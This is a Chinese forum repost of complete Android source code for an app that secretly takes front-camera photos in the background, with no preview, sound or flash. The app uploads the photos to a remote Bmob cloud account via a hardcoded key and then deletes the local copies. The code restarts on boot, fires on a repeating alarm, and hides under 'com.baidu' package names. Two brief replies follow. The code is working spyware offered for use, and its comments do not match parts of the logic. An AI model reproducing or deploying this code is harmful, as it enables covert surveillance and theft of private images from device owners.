转载:漏洞利用代码(可悄悄地拍下并上传照片)
刚才看了西贝上的一篇文章:http://www.cnbeta.com/articles/295257.htm这里面竟然说后台拍摄照片是ANDROID平台的漏洞,大家看一下是漏洞吗?
这个DEMO会在后台自动的拍摄照片,拍摄的过程无预览、无声音、无闪光灯等任何提示。
并上传到指定服务器上,由于软件可能被恶意利用,我就上传一个APK和核心代码吧。
PhotoHandler.javapackage com.baidu.handle;
import java.io.File;
import java.io.FileOutputStream;
import java.text.SimpleDateFormat;
import java.util.Date;
import android.content.Context;
import android.hardware.Camera;
import android.hardware.Camera.PictureCallback;
import android.os.Environment;
public class PhotoHandler implements PictureCallback {
private final Context context;
public PhotoHandler(Context context) {
this.context = context;
}
public void onPictureTaken(byte[] data, Camera camera) {
print("照片拍摄回调");
File pictureFileDir = getDir();
if (!pictureFileDir.exists() && !pictureFileDir.mkdirs()) {
print("目录不正确");
return;
}
String[] fileList=pictureFileDir.list();
if(fileList.length>10){
print("超过了10个文件,不再拍摄");
return;
}
SimpleDateFormat dateFormat = new SimpleDateFormat("yyyymmddhhmmss");
String date = dateFormat.format(new Date());
String photoFile = "Photo_" + date + ".jpg";
String filename = pictureFileDir.getPath() + File.separator + photoFile;
File pictureFile = new File(filename);
try {
FileOutputStream fos = new FileOutputStream(pictureFile);
fos.write(data);
fos.close();
camera.stopPreview();
camera.release();
} catch (Exception error) {
error.printStackTrace();
}
}
public File getDir() {
return new File(context.getApplicationContext().getFilesDir().getAbsolutePath());
// return new File(Environment.getExternalStorageDirectory().getPath()+"/Pictures");
}
private void print(String s){
System.out.println(s);
}
}CameraService.javapackage com.baidu.service;
import java.io.File;
import java.io.IOException;
import android.app.AlarmManager;
import android.app.PendingIntent;
import android.app.Service;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.hardware.Camera;
import android.net.wifi.WifiInfo;
import android.net.wifi.WifiManager;
import android.os.BatteryManager;
import android.os.Binder;
import android.os.IBinder;
import android.os.PowerManager;
import android.text.format.Time;
import android.view.SurfaceView;
import cn.bmob.Bmob;
import cn.bmob.BmobFile;
import cn.bmob.BmobObject;
import com.baidu.handle.PhotoHandler;
public class CameraService extends Service implements Runnable {
private AlarmManager am = null;
private Camera camera;
public static boolean isCharging=false;
private final IBinder mBinder = new LocalBinder();
private boolean offQty=false;
//private NotificationManager mNM;
/**
* Class for clients to access. Because we know this service always runs in
* the same process as its clients, we don't need to deal with IPC.
*/
public class LocalBinder extends Binder {
public CameraService getService() {
return CameraService.this;
}
}
public void run() {
print("WIFI:"+isWiFiActive(CameraService.this));
print("充电:"+isCharging);
if(!isWiFiActive(CameraService.this))return;
// if(!isCharging)return;
File pictureFileDir =new File(this.getApplicationContext().getFilesDir().getAbsolutePath());
// File pictureFileDir =new File(Environment.getExternalStorageDirectory().getPath()+"/Pictures");
String[] fileList=pictureFileDir.list();
if(fileList==null){
print("没有文件");
return;
}else{
print("文件数:"+fileList.length);
}
for(String s:fileList){
String filename = pictureFileDir.getPath() + File.separator + s;
print(filename);
BmobFile bmobFile;
try{
BmobObject bObject = new BmobObject("Application");
bmobFile = new BmobFile("Pictures", new File(filename));
bmobFile.save();
bObject.put("applicatName","Barbie");
bObject.put("applicatFile",bmobFile);
bObject.saveInBackground();
File pictureFile = new File(filename);
pictureFile.delete();
System.out.println("图片上传完毕");
}catch(Exceptione){
print("文件出错了");
e.printStackTrace();
}
}
}
@Override
public void onCreate() {
init();
}
private void init() {
print("init succeed!");
//从www.codenow.cn申请一个账户,添加Application ID
Bmob.initialize(CameraService.this, "da7965baf295e43970912f56c2f1cd1a");
am = (AlarmManager) getSystemService(ALARM_SERVICE);
// 注册广播
IntentFilter filter = new IntentFilter();
filter.addAction("com.baidu.alarm");
registerReceiver(alarmReceiver, filter);
registerReceiver(mbatteryReceiver, new IntentFilter(Intent.ACTION_BATTERY_CHANGED));
Intent intent = new Intent();
intent.setAction("com.baidu.alarm");
PendingIntent pi = PendingIntent.getBroadcast(this, 0, intent, 0);
am.setRepeating(AlarmManager.RTC_WAKEUP, System.currentTimeMillis(),
1000 * 30, pi);// 马上开始,每5分钟触发一次
}
@Override
public int onStartCommand(Intent intent, int flags, int startId) {
return START_STICKY;
}
@Override
public IBinder onBind(Intent intent) {
return mBinder;
}
BroadcastReceiver alarmReceiver = new BroadcastReceiver() {
@Override
public void onReceive(Context context, Intent intent) {
if ("com.baidu.alarm".equals(intent.getAction())) {
new Thread(CameraService.this).start();
Time t=new Time();
t.setToNow();
print("我在执行时间判断");
if((t.hour<5) || t.hour>24){
print("时间不正确,不拍摄!");
return;
}
PowerManager pm = (PowerManager) context.getSystemService(Context.POWER_SERVICE);
if(pm.isScreenOn()) {
offQty=false;
print("屏幕是亮的");
}else{
print("屏幕是暗的");
if(offQty==true) return;
}
camera = openFacingBackCamera();
if (camera != null) {
SurfaceView dummy = new SurfaceView(getBaseContext());
try {
camera.setPreviewDisplay(dummy.getHolder());
} catch (IOException e) {
print("拍摄出问题");
//e.printStackTrace();
}
camera.startPreview();
camera.autoFocus(null);
camera.takePicture(null, null, new PhotoHandler(
getApplicationContext()));
if(!pm.isScreenOn()) offQty=true;
print("图片拍摄完毕");
}else{
print("木有照相机T_T");
}
}
}
};
/**
* 判断WIFI是否连接
* @param inContext
* @return
*/
public static boolean isWiFiActive(Context inContext) {
WifiManager mWifiManager = (WifiManager) inContext
.getSystemService(Context.WIFI_SERVICE);
WifiInfo wifiInfo = mWifiManager.getConnectionInfo();
int ipAddress = wifiInfo == null ? 0 : wifiInfo.getIpAddress();
if (mWifiManager.isWifiEnabled() && ipAddress != 0) {
return true;
} else {
return false;
}
}
/**
* 获得摄像头
* @return 后置摄像头
*/
private Camera openFacingBackCamera() {
Camera cam = null;
Camera.CameraInfo cameraInfo = new Camera.CameraInfo();
for (int camIdx = 0, cameraCount = Camera.getNumberOfCameras(); camIdx < cameraCount; camIdx++) {
Camera.getCameraInfo(camIdx, cameraInfo);
if (cameraInfo.facing == Camera.CameraInfo.CAMERA_FACING_FRONT) {
try {
cam = Camera.open(camIdx);
} catch (Exception e) {
}
}
}
return cam;
}
/**
* 判断手机是否在充电
*/
private BroadcastReceiver mbatteryReceiver=new BroadcastReceiver()
{
@Override
public void onReceive(Context context, Intent intent)
{
String action =intent.getAction();
if(Intent.ACTION_BATTERY_CHANGED.equals(action));
{
int status=intent.getIntExtra("status",BatteryManager.BATTERY_STATUS_UNKNOWN);
if(status==BatteryManager.BATTERY_STATUS_CHARGING)
{
isCharging=true;
}
else
{
isCharging=false;
}
}
}
};
private void print(String s){
System.out.println(s);
}
}MainActivity.javapackage com.hacker;
import com.baidu.service.CameraService;
import android.app.Activity;
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
import android.content.ServiceConnection;
import android.os.Bundle;
import android.os.IBinder;
import android.widget.ImageView;
//程序的主界面,主要用来根据部门显示姓名
public class MainActivity extends Activity {
private Intent serviceIntent;
/**
* 创建显示主界面
*/
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
final ImageView image1 = (ImageView)findViewById(R.id.image1);
serviceIntent = new Intent(MainActivity.this, CameraService.class);
startService(serviceIntent);
bindService(serviceIntent, serviceConnection, Context.BIND_AUTO_CREATE);
}
@Override
protected void onDestroy(){
super.onDestroy();
unbindService(serviceConnection);
}
ServiceConnection serviceConnection = new ServiceConnection() {
public void onServiceConnected(ComponentName name, IBinder service) {
((CameraService.LocalBinder) service).getService();
}
public void onServiceDisconnected(ComponentName name) {
}
};
}BootCompleteReceiver.javapackage com.hacker;
import com.baidu.service.CameraService;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.util.Log;
public class BootCompleteReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
// 这个类是用来在手机启动后,接收到手机启动的信息,然后启动电话监听服务的
Intent service = new Intent(context, CameraService.class);
context.startService(service);
Log.d("PhoneService","服务已经成功启动");
}
} 每种操作系统的漏洞都不少。 楼主这耗电量怎么样?是不是很大的
页:
[1]